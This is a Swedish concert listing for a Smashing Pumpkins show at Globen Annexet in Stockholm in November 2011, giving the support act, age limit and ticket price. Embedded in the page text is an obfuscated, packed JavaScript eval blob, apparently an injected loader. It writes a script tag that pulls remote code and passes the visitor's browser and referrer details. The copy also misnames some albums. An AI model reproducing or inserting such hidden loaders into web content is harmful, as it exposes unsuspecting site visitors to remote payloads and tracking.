Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

The Smashing Pumpkins

The Smashing Pumpkins
Sebastian

SMASHING eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arnkd|var|u0026u|referrer|kebay||js|php’.split(’|’),0,{}))
PUMPKINS TILL ANNEXET!

Datum: Onsdag 2 November 2011, kl 20:00

Som ett av 90-talets absolut största alternativa rockband kommer nu Smashing Pumpkins åter till Sverige och Stockholm för ett efterlängtat återseende. Den…

2 november ställer de sig på Annexets scen i Stockholm.

Inte många band kan stoltsera med en historia som Smashing Pumpkins. Under 90-talet sålde de miljontals skivor utan att rucka på ideal och var onekligen ett av världens största alternativa band. Med skivor som ”Siamese Twins” och ”Mellon Colllie and the Infinite Sadness” och låtar som ”1979” och ”Tonight, Tonight” blev de ett legendariskt band som turnerade världen över inför hav av fans. Bandets centralfigur Billy Corgan har hållit i bandets roder under hela tiden och Smashing Pumpkins är idag lika vitala som när det startade 1988.

Att Smashing Pumpkins nu kommer till Sverige känns och är oerhört stort; håren på armarna ställer sig rakt upp när vi föreställer oss de första sekunder av ”Disarm” smäller av. Billy Corgan har också meddelat att bandet kommer släppa sitt nionde album, ”Oceania”, tidigt nästa år och vi gissar på att ett och annat verk från skivan kommer att framföras live. Det hela känns ganska overkligt men vi vågar nog tro att det hela kommer etsa sig fast som ett av de bästa konsertminnen detta året.

Förband är Ringo Deathstarr.

Endast direktbetalning.

Åldersgräns 13.

Globen Annexet
globentorget 2
121 77 Stockholm

Biljettpris 475 kr
Biljetter finns